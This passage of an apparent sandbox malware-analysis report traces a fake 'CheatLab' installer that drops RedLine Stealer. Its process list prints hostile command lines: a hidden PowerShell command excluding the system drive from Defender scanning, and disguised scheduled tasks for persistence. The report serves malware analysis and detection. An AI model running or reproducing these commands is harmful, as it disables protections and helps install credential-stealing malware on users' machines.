                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:01:30:00
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 19958F299480DC364B0F0BF5C3172345 E Global\MSI0000
                                                    Imagebase:0xdf0000
                                                    File size:59'904 bytes
                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:6
                                                    Start time:01:30:00
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\Installer\MSI7D5A.tmp
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\Installer\MSI7D5A.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat
                                                    Imagebase:0xa40000
                                                    File size:399'328 bytes
                                                    MD5 hash:B9545ED17695A32FACE8C3408A6A3553
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:01:30:00
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\System32\cmd.exe" /C ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat"
                                                    Imagebase:0x790000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:8
                                                    Start time:01:30:01
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:9
                                                    Start time:01:30:01
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
                                                    Imagebase:0x280000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:11
                                                    Start time:01:30:06
                                                    Start date:04/11/2023
                                                    Path:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
                                                    Imagebase:0x7ff7b1de0000
                                                    File size:1'159'184 bytes
                                                    MD5 hash:1BC7714501F86D5988816461F3637269
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs
                                                    • Detection: 1%, Virustotal, Browse
                                                    Reputation:low
                                                    Has exited:false

                                                    General

                                                    Target ID:13
                                                    Start time:01:30:14
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks /create /sc daily /st 12:47 /f /tn AMDCheckUpdates_NzEx /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua""
                                                    Imagebase:0x7ff7981a0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:14
                                                    Start time:01:30:14
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks /create /sc daily /st 12:47 /f /tn "LuaJIT" /tr ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua""
                                                    Imagebase:0x7ff7981a0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:15
                                                    Start time:01:30:14
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:16
                                                    Start time:01:30:14
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:17
                                                    Start time:01:30:15
                                                    Start date:04/11/2023
                                                    Path:C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua
                                                    Imagebase:0x7ff73ae60000
                                                    File size:1'159'184 bytes
                                                    MD5 hash:1BC7714501F86D5988816461F3637269
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs
                                                    • Detection: 1%, Virustotal, Browse
                                                    Has exited:true

                                                    General

                                                    Target ID:18
                                                    Start time:01:30:26
                                                    Start date:04/11/2023
                                                    Path:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
                                                    Imagebase:0x7ff7b1de0000
                                                    File size:1'159'184 bytes
                                                    MD5 hash:1BC7714501F86D5988816461F3637269
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:19
                                                    Start time:01:30:35
                                                    Start date:04/11/2023
                                                    Path:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
                                                    Imagebase:0x7ff7b1de0000
                                                    File size:1'159'184 bytes
                                                    MD5 hash:1BC7714501F86D5988816461F3637269
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:21
                                                    Start time:01:30:50
                                                    Start date:04/11/2023
                                                    Path:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                    Imagebase:0x400000
                                                    File size:1'070'058'901 bytes
                                                    MD5 hash:A8A24AF1D9E83BE788BD28D64967FE32
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.2617633919.00000000020B2000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    Has exited:true

                                                    General

                                                    Target ID:22
                                                    Start time:01:30:50
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:25
                                                    Start time:01:30:53
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8016 -s 840
                                                    Imagebase:0x2b0000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:1.3%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:31.2%
                                                      Total number of Nodes:320
                                                      Total number of Limit Nodes:7
                                                      execution_graph 33401 a63084 33402 a63090 CallCatchBlock 33401->33402 33427 a62de4 33402->33427 33404 a63097 33405 a631ea 33404->33405 33416 a630c1 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 33404->33416 33461 a633a8 4 API calls 2 library calls 33405->33461 33407 a631f1 33462 a72ed9 23 API calls __CreateFrameInfo 33407->33462 33409 a631f7 33463 a72e9d 23 API calls __CreateFrameInfo 33409->33463 33411 a631ff 33412 a630e0 33413 a63161 33438 a634c3 GetStartupInfoW _Getvals 33413->33438 33415 a63167 33439 a4cdb0 GetCommandLineW 33415->33439 33416->33412 33416->33413 33460 a72eb3 41 API calls 4 library calls 33416->33460 33428 a62ded 33427->33428 33464 a635a9 IsProcessorFeaturePresent 33428->33464 33430 a62df9 33465 a658dc 10 API calls 2 library calls 33430->33465 33432 a62dfe 33437 a62e02 33432->33437 33466 a7393e 33432->33466 33435 a62e19 33435->33404 33437->33404 33438->33415 33440 a4cdf8 33439->33440 33525 a41f80 LocalAlloc 33440->33525 33442 a4ce09 33526 a469a0 33442->33526 33444 a4ce58 33445 a4ce5c 33444->33445 33446 a4ce69 33444->33446 33618 a46600 98 API calls __ehhandler$___std_fs_get_file_attributes_by_handle@8 33445->33618 33534 a4c6a0 LocalAlloc LocalAlloc 33446->33534 33449 a4ce65 33451 a4ceb0 ExitProcess 33449->33451 33450 a4ce72 33535 a4c870 33450->33535 33456 a4cea4 33620 a4cec0 LocalFree LocalFree 33456->33620 33457 a4ce9a 33619 a4cce0 CreateFileW SetFilePointer WriteFile CloseHandle 33457->33619 33460->33413 33461->33407 33462->33409 33463->33411 33464->33430 33465->33432 33470 a7bedb 33466->33470 33469 a658fb 7 API calls 2 library calls 33469->33437 33471 a7beeb 33470->33471 33472 a62e0b 33470->33472 33471->33472 33474 a76d2d 33471->33474 33472->33435 33472->33469 33475 a76d39 CallCatchBlock 33474->33475 33486 a71c9a EnterCriticalSection 33475->33486 33477 a76d40 33487 a7c4cc 33477->33487 33482 a76d59 33501 a76c7d GetStdHandle GetFileType 33482->33501 33483 a76d6f 33483->33471 33485 a76d5e 33502 a76d84 LeaveCriticalSection std::_Lockit::~_Lockit 33485->33502 33486->33477 33488 a7c4d8 CallCatchBlock 33487->33488 33489 a7c502 33488->33489 33490 a7c4e1 33488->33490 33503 a71c9a EnterCriticalSection 33489->33503 33511 a67370 14 API calls __Wcrtomb 33490->33511 33493 a7c4e6 33512 a67017 41 API calls collate 33493->33512 33497 a76d4f 33497->33485 33500 a76bc7 44 API calls 33497->33500 33498 a7c50e 33499 a7c53a 33498->33499 33504 a7c41c 33498->33504 33513 a7c561 LeaveCriticalSection std::_Lockit::~_Lockit 33499->33513 33500->33482 33501->33485 33502->33483 33503->33498 33514 a770bb 33504->33514 33506 a7c43b 33522 a753b8 14 API calls 2 library calls 33506->33522 33507 a7c42e 33507->33506 33521 a7776f 6 API calls std::_Locinfo::_Locinfo_ctor 33507->33521 33510 a7c490 33510->33498 33511->33493 33512->33497 33513->33497 33519 a770c8 std::_Locinfo::_W_Getmonths 33514->33519 33515 a77108 33524 a67370 14 API calls __Wcrtomb 33515->33524 33516 a770f3 RtlAllocateHeap 33518 a77106 33516->33518 33516->33519 33518->33507 33519->33515 33519->33516 33523 a7bf83 EnterCriticalSection LeaveCriticalSection std::_Locinfo::_W_Getmonths 33519->33523 33521->33507 33522->33510 33523->33519 33524->33518 33525->33442 33528 a469f2 33526->33528 33527 a46a34 33529 a62937 __ehhandler$___std_fs_get_file_attributes_by_handle@8 5 API calls 33527->33529 33528->33527 33531 a46a22 33528->33531 33530 a46a42 33529->33530 33530->33444 33621 a62937 33531->33621 33533 a46a30 33533->33444 33534->33450 33536 a4c889 33535->33536 33539 a4cb32 33535->33539 33537 a4cb92 33536->33537 33536->33539 33629 a46250 14 API calls 33537->33629 33542 a46a50 33539->33542 33540 a4cba2 RegOpenKeyExW 33540->33539 33541 a4cbc0 RegQueryValueExW 33540->33541 33541->33539 33543 a46a84 33542->33543 33544 a46aa3 GetCurrentProcess OpenProcessToken 33542->33544 33545 a62937 __ehhandler$___std_fs_get_file_attributes_by_handle@8 5 API calls 33543->33545 33548 a46adf 33544->33548 33549 a46b09 33544->33549 33547 a46a9f 33545->33547 33547->33456 33547->33457 33550 a46af4 CloseHandle 33548->33550 33551 a46b02 33548->33551 33630 a45de0 33549->33630 33550->33551 33678 a457c0 GetCurrentProcess OpenProcessToken 33551->33678 33555 a46b20 33558 a41770 42 API calls 33555->33558 33556 a46b2e 33559 a46b32 33556->33559 33560 a46b3f 33556->33560 33557 a46c29 33562 a46ddb 33557->33562 33568 a46c43 33557->33568 33558->33548 33563 a41770 42 API calls 33559->33563 33633 a45f40 ConvertSidToStringSidW 33560->33633 33683 a42310 56 API calls 33562->33683 33563->33548 33566 a46e04 33569 a46f2d 33566->33569 33684 a446f0 52 API calls 33566->33684 33735 a42310 56 API calls 33568->33735 33748 a411d0 RaiseException _com_raise_error 33569->33748 33571 a46c57 33571->33569 33736 a446f0 52 API calls 33571->33736 33575 a46b85 33664 a42e60 33575->33664 33578 a46e59 33685 a42310 56 API calls 33578->33685 33579 a42e60 42 API calls 33582 a46bf5 33579->33582 33670 a41770 33582->33670 33583 a46e68 33583->33569 33686 a446f0 52 API calls 33583->33686 33585 a46cad 33738 a42310 56 API calls 33585->33738 33586 a46e29 33586->33578 33745 a44ac0 42 API calls 3 library calls 33586->33745 33590 a46c16 FindCloseChangeNotification 33590->33551 33591 a46c7c 33591->33585 33737 a44ac0 42 API calls 3 library calls 33591->33737 33592 a46cc7 33592->33569 33739 a446f0 52 API calls 33592->33739 33595 a46eb9 33687 a42310 56 API calls 33595->33687 33598 a46ec4 33598->33569 33688 a446f0 52 API calls 33598->33688 33599 a46d19 33741 a42310 56 API calls 33599->33741 33600 a46e8a 33600->33595 33746 a44ac0 42 API calls 3 library calls 33600->33746 33603 a46ce9 33603->33599 33740 a44ac0 42 API calls 3 library calls 33603->33740 33604 a46d24 33604->33569 33742 a446f0 52 API calls 33604->33742 33607 a46f10 33689 a452f0 33607->33689 33610 a46d70 33744 a44ba0 178 API calls 3 library calls 33610->33744 33611 a46ee6 33611->33607 33747 a44ac0 42 API calls 3 library calls 33611->33747 33612 a46d4e 33743 a44ac0 42 API calls 3 library calls 33612->33743 33615 a46d46 33615->33610 33615->33612 33615->33615 33616 a46d8a 33616->33569 33618->33449 33619->33456 33620->33451 33622 a62940 IsProcessorFeaturePresent 33621->33622 33623 a6293f 33621->33623 33625 a629a5 33622->33625 33623->33533 33628 a62968 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 33625->33628 33627 a62a88 33627->33533 33628->33627 33629->33540 33749 a45e40 GetTokenInformation 33630->33749 33634 a45fd2 33633->33634 33635 a45fac 33633->33635 33636 a424c0 47 API calls 33634->33636 33638 a424c0 47 API calls 33635->33638 33637 a45fc9 33636->33637 33639 a45ff5 LocalFree 33637->33639 33640 a46003 33637->33640 33638->33637 33639->33640 33641 a424c0 33640->33641 33645 a424d1 codecvt 33641->33645 33646 a424fd 33641->33646 33642 a425f5 33760 a42770 42 API calls 33642->33760 33643 a42515 33648 a425f0 33643->33648 33649 a42566 LocalAlloc 33643->33649 33645->33575 33646->33642 33646->33643 33646->33648 33652 a42582 33646->33652 33647 a425fa 33761 a67027 41 API calls 2 library calls 33647->33761 33759 a42d70 RaiseException _com_raise_error 33648->33759 33649->33647 33653 a42577 33649->33653 33657 a42586 LocalAlloc 33652->33657 33661 a42593 codecvt 33652->33661 33653->33661 33657->33661 33660 a425e5 33660->33575 33661->33647 33661->33660 33662 a425d8 33661->33662 33662->33660 33663 a425de LocalFree 33662->33663 33663->33660 33665 a42eb7 33664->33665 33667 a42e8d 33664->33667 33665->33579 33666 a42eaa 33666->33665 33668 a42eb0 LocalFree 33666->33668 33667->33664 33667->33666 33762 a67027 41 API calls 2 library calls 33667->33762 33668->33665 33671 a417c1 33670->33671 33672 a4179b 33670->33672 33671->33551 33671->33590 33673 a417ba LocalFree 33672->33673 33674 a417b4 33672->33674 33675 a417e5 33672->33675 33673->33671 33674->33671 33674->33673 33763 a67027 41 API calls 2 library calls 33675->33763 33679 a457e7 GetTokenInformation 33678->33679 33680 a457e1 33678->33680 33681 a45816 33679->33681 33682 a4581e CloseHandle 33679->33682 33680->33557 33681->33682 33682->33557 33683->33566 33684->33586 33685->33583 33686->33600 33687->33598 33688->33611 33690 a45361 33689->33690 33764 a45d30 33690->33764 33692 a4537b 33693 a45d30 41 API calls 33692->33693 33694 a4538b 33693->33694 33768 a459c0 33694->33768 33696 a457b0 33787 a411d0 RaiseException _com_raise_error 33696->33787 33700 a4539b 33700->33696 33776 a67852 33700->33776 33702 a453e1 33703 a45d30 41 API calls 33702->33703 33713 a453f5 33703->33713 33704 a4551d GetForegroundWindow 33732 a45529 33704->33732 33705 a455f7 ShellExecuteExW 33706 a45609 33705->33706 33710 a45612 33705->33710 33785 a45890 6 API calls 33706->33785 33707 a45493 GetWindowsDirectoryW 33783 a45b10 70 API calls 33707->33783 33709 a45625 ShellExecuteExW 33712 a45646 33709->33712 33714 a4563d 33709->33714 33710->33709 33710->33712 33716 a4566c GetModuleHandleW GetProcAddress GetProcessId AllowSetForegroundWindow 33712->33716 33717 a456fd 33712->33717 33713->33707 33722 a454cc 33713->33722 33786 a45890 6 API calls 33714->33786 33715 a454b4 33784 a45b10 70 API calls 33715->33784 33716->33717 33720 a45698 33716->33720 33721 a45721 33717->33721 33725 a4570e WaitForSingleObject GetExitCodeProcess 33717->33725 33720->33717 33724 a456a1 GetModuleHandleW GetProcAddress 33720->33724 33779 a45940 33721->33779 33722->33704 33722->33732 33726 a456b4 33724->33726 33727 a456fa 33724->33727 33725->33721 33729 a456ed 33726->33729 33730 a456c8 Sleep EnumWindows 33726->33730 33727->33717 33729->33727 33733 a456f3 BringWindowToTop 33729->33733 33730->33726 33730->33729 33857 a45830 GetWindowThreadProcessId GetWindowLongW 33730->33857 33731 a62937 __ehhandler$___std_fs_get_file_attributes_by_handle@8 5 API calls 33734 a457a8 33731->33734 33732->33705 33733->33727 33734->33569 33735->33571 33736->33591 33737->33585 33738->33592 33739->33603 33740->33599 33741->33604 33742->33615 33743->33610 33744->33616 33745->33578 33746->33595 33747->33607 33750 a45e18 33749->33750 33751 a45ebe GetLastError 33749->33751 33750->33555 33750->33556 33751->33750 33752 a45ec9 33751->33752 33753 a45f0e GetTokenInformation 33752->33753 33754 a45ed9 _Getvals 33752->33754 33755 a45ee9 33752->33755 33753->33750 33754->33753 33758 a460d0 45 API calls 3 library calls 33755->33758 33757 a45ef2 33757->33753 33758->33757 33765 a45d6e 33764->33765 33766 a45d7d 33765->33766 33788 a44a10 41 API calls 4 library calls 33765->33788 33766->33692 33769 a459f8 33768->33769 33771 a45a03 33768->33771 33770 a45d30 41 API calls 33769->33770 33772 a45a01 33770->33772 33774 a45a1a 33771->33774 33789 a42310 56 API calls 33771->33789 33772->33700 33790 a45a60 42 API calls 33774->33790 33791 a67869 33776->33791 33780 a45971 33779->33780 33781 a4572d 33779->33781 33780->33781 33782 a45981 FindCloseChangeNotification 33780->33782 33781->33731 33782->33781 33783->33715 33784->33722 33785->33710 33786->33712 33788->33766 33789->33774 33790->33772 33796 a67078 33791->33796 33797 a67096 33796->33797 33798 a6708f 33796->33798 33797->33798 33841 a757cc 41 API calls 3 library calls 33797->33841 33804 a676d9 33798->33804 33800 a670b7 33842 a75ab7 41 API calls __Wcscoll 33800->33842 33802 a670cd 33843 a75b15 41 API calls std::_Locinfo::_W_Getmonths 33802->33843 33805 a67709 ___crtCompareStringW 33804->33805 33809 a676f3 33804->33809 33808 a67720 33805->33808 33805->33809 33807 a676f8 33845 a67017 41 API calls collate 33807->33845 33812 a67702 33808->33812 33846 a75c2a 6 API calls 2 library calls 33808->33846 33844 a67370 14 API calls __Wcrtomb 33809->33844 33816 a62937 __ehhandler$___std_fs_get_file_attributes_by_handle@8 5 API calls 33812->33816 33813 a6776e 33814 a6778f 33813->33814 33815 a67778 33813->33815 33818 a67794 33814->33818 33819 a677a5 33814->33819 33847 a67370 14 API calls __Wcrtomb 33815->33847 33820 a453d3 33816->33820 33849 a67370 14 API calls __Wcrtomb 33818->33849 33821 a67826 33819->33821 33824 a677cc 33819->33824 33831 a677b9 __alloca_probe_16 33819->33831 33820->33696 33820->33702 33854 a67370 14 API calls __Wcrtomb 33821->33854 33822 a6777d 33848 a67370 14 API calls __Wcrtomb 33822->33848 33850 a75bdc 15 API calls 2 library calls 33824->33850 33827 a6782b 33855 a67370 14 API calls __Wcrtomb 33827->33855 33830 a677d2 33830->33821 33830->33831 33831->33821 33834 a677e6 33831->33834 33832 a67813 33856 a62326 14 API calls __freea 33832->33856 33851 a75c2a 6 API calls 2 library calls 33834->33851 33836 a67802 33837 a6781a 33836->33837 33838 a67809 33836->33838 33853 a67370 14 API calls __Wcrtomb 33837->33853 33852 a6b762 41 API calls 2 library calls 33838->33852 33841->33800 33842->33802 33843->33798 33844->33807 33845->33812 33846->33813 33847->33822 33848->33812 33849->33807 33850->33830 33851->33836 33852->33832 33853->33832 33854->33827 33855->33832 33856->33812

                                                      Executed Functions

                                                      Function 00A452F0 Relevance: 54.7, APIs: 15, Strings: 16, Instructions: 402libraryloadersleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 a452f0-a453a8 call a463a0 call a45d30 * 2 call a459c0 9 a457b0-a457ba call a411d0 0->9 10 a453ae-a453bd 0->10 12 a453bf-a453c7 call a449a0 10->12 13 a453c9-a453db call a67852 10->13 12->13 13->9 19 a453e1-a4540a call a45d30 13->19 22 a45414-a45419 19->22 23 a4540c-a4540f 19->23 24 a454cf-a4551b 22->24 25 a4541f-a45429 22->25 23->22 26 a4551d-a45526 GetForegroundWindow 24->26 27 a45529-a4552b 24->27 28 a45430-a45436 25->28 26->27 29 a455f7-a45607 ShellExecuteExW 27->29 30 a45531-a45535 27->30 31 a45456-a45458 28->31 32 a45438-a4543b 28->32 36 a45614-a45616 29->36 37 a45609-a45612 call a45890 29->37 34 a45537-a4553e 30->34 35 a45540-a4554c 30->35 33 a4545b-a4545d 31->33 38 a45452-a45454 32->38 39 a4543d-a45445 32->39 40 a45493-a454cc GetWindowsDirectoryW call a45b10 * 2 33->40 41 a4545f 33->41 34->34 34->35 42 a45550-a4555d 35->42 44 a45646-a45666 call a45b30 36->44 45 a45618-a4561e 36->45 37->36 38->33 39->31 46 a45447-a45450 39->46 40->24 47 a45464-a4546a 41->47 42->42 48 a4555f-a4556b 42->48 60 a4566c-a45696 GetModuleHandleW GetProcAddress GetProcessId AllowSetForegroundWindow 44->60 61 a456fd-a45702 44->61 50 a45625-a4563b ShellExecuteExW 45->50 51 a45620-a45623 45->51 46->28 46->38 54 a4546c-a4546f 47->54 55 a4548a-a4548c 47->55 56 a45570-a4557d 48->56 50->44 57 a4563d-a45641 call a45890 50->57 51->44 51->50 62 a45486-a45488 54->62 63 a45471-a45479 54->63 65 a4548f-a45491 55->65 56->56 64 a4557f-a455f5 call a464a0 * 5 56->64 57->44 60->61 68 a45698-a4569f 60->68 71 a45704-a4570c 61->71 72 a45721-a45728 call a45940 61->72 62->65 63->55 69 a4547b-a45484 63->69 64->29 65->24 65->40 68->61 75 a456a1-a456b2 GetModuleHandleW GetProcAddress 68->75 69->47 69->62 71->72 77 a4570e-a4571b WaitForSingleObject GetExitCodeProcess 71->77 78 a4572d-a45744 72->78 79 a456b4-a456c1 75->79 80 a456fa 75->80 77->72 82 a45746-a45749 78->82 83 a4574e-a45762 78->83 89 a456c3-a456c6 79->89 80->61 82->83 85 a45764-a45767 83->85 86 a4576c-a45781 83->86 85->86 90 a45783-a45786 86->90 91 a4578b-a457af call a62937 86->91 93 a456ef-a456f1 89->93 94 a456c8-a456eb Sleep EnumWindows 89->94 90->91 93->80 99 a456f3-a456f4 BringWindowToTop 93->99 94->89 98 a456ed 94->98 98->99 99->80
                                                      APIs
                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 00A4549C
                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 00A4551D
                                                      • ShellExecuteExW.SHELL32(?), ref: 00A45601
                                                      • ShellExecuteExW.SHELL32(?), ref: 00A45637
                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00A4567C
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00A45685
                                                      • GetProcessId.KERNELBASE(?,?,?,?,?,?,?), ref: 00A45688
                                                      • AllowSetForegroundWindow.USER32(00000000), ref: 00A4568B
                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00A456AB
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00A456AE
                                                      • Sleep.KERNEL32(00000064,?,?,?,?,?,?), ref: 00A456CA
                                                      • EnumWindows.USER32(00A45830,?), ref: 00A456DF
                                                      • BringWindowToTop.USER32(00000000), ref: 00A456F4
                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 00A45711
                                                      • GetExitCodeProcess.KERNELBASE(?,?), ref: 00A4571B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Window$AddressExecuteForegroundHandleModuleProcProcessShellWindows$AllowBringCodeDirectoryEnumExitObjectSingleSleepWait
                                                      • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
                                                      • API String ID: 185584925-2796270252
                                                      • Opcode ID: 038f4f625846719812a304c4ff56971dc455b032db57081d831e6e9f76a1b212
                                                      • Instruction ID: 76ca26d38ed76b94ae22593a58740e5642e70ed7f9a8cd54c43c148c8e3a93c2
                                                      • Opcode Fuzzy Hash: 038f4f625846719812a304c4ff56971dc455b032db57081d831e6e9f76a1b212
                                                      • Instruction Fuzzy Hash: CBE1D239E00A099BCF11DFB8C985BAEB7F5FF85710F644629E815AB292E7309D41CB50
                                                      Uniqueness

